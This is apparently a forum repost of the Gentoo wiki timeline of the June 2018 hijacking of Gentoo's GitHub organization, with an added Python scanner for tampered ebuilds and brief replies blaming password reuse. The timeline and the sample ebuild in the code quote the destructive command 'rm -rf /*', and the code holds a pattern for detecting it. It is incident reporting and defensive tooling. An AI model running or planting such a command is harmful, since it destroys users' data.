Technical analysis

Gentoo Linux GitHub account hacked on June 28; rm -rf added to every ebuild file
2021-06-23 12:38:42
idczone
2018-06-28
20:05 2nd to last known legitimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legitimate commit to gentoo/musl. Matches git.gentoo.org/proj/musl.git.
Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legitimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……

Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
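As an added example (not from the Gentoo wiki or the original post), here is a small Python check a consumer of the GitHub mirror could run over a checked-out tree to flag ebuilds with a destructive command at top level, which is what the timeline describes being injected. The sample ebuilds are constructed for the example, and the brace tracking that separates top-level code from phase-function bodies is a rough heuristic, not a bash parser.

```python
import re
from pathlib import Path

# Constructed sample ebuilds (not from the Gentoo tree): one clean, one with
# the kind of line the timeline describes injected at the top.
CLEAN_EBUILD = """\
# Copyright 1999-2018 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2

EAPI=6

DESCRIPTION="Example package"
SLOT="0"

src_install() {
\trm -rf "${D}"/usr/share/doc/tmp
}
"""
TAMPERED_EBUILD = "rm -rf /*\n" + CLEAN_EBUILD

# rm with any flags whose target is the filesystem root ("/" or "/*"),
# optionally followed by whitespace, "&", ";" or end of line.
DESTRUCTIVE = re.compile(r"\brm\s+(?:-\w+\s+)*/\*?(?:\s|&|;|$)")


def find_top_level_destructive(text: str):
    """Return (line_no, line) for destructive commands that would run as soon
    as the ebuild is sourced, i.e. outside any function body and not in a
    comment. Legitimate rm calls inside phase functions are not reported."""
    hits = []
    depth = 0  # brace nesting; 0 means top-level code
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if depth == 0 and DESTRUCTIVE.search(line):
            hits.append((no, line))
        # Rough tracking of `name() {` ... `}` blocks; ${VAR} pairs cancel out.
        depth += line.count("{") - line.count("}")
    return hits


def scan_tree(root: str):
    """Scan every *.ebuild under root; returns {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("*.ebuild"):
        hits = find_top_level_destructive(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report
```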
How goes the battle on Reach?

Could OP check what day it is before posting?

It was stopped at the time.

If you're not a Gentoo fan, please don't start flaming without reading the link first; the official announcement that this incident was resolved only came last night.
What I wanted to share is a story, not a news item.

The first reply set a bad tone.
But I still don't see how they got hold of the GitHub account. Brute force? "tries a bad password"

Looks like the admin's password was reused across sites.

Was two-factor authentication not enabled?
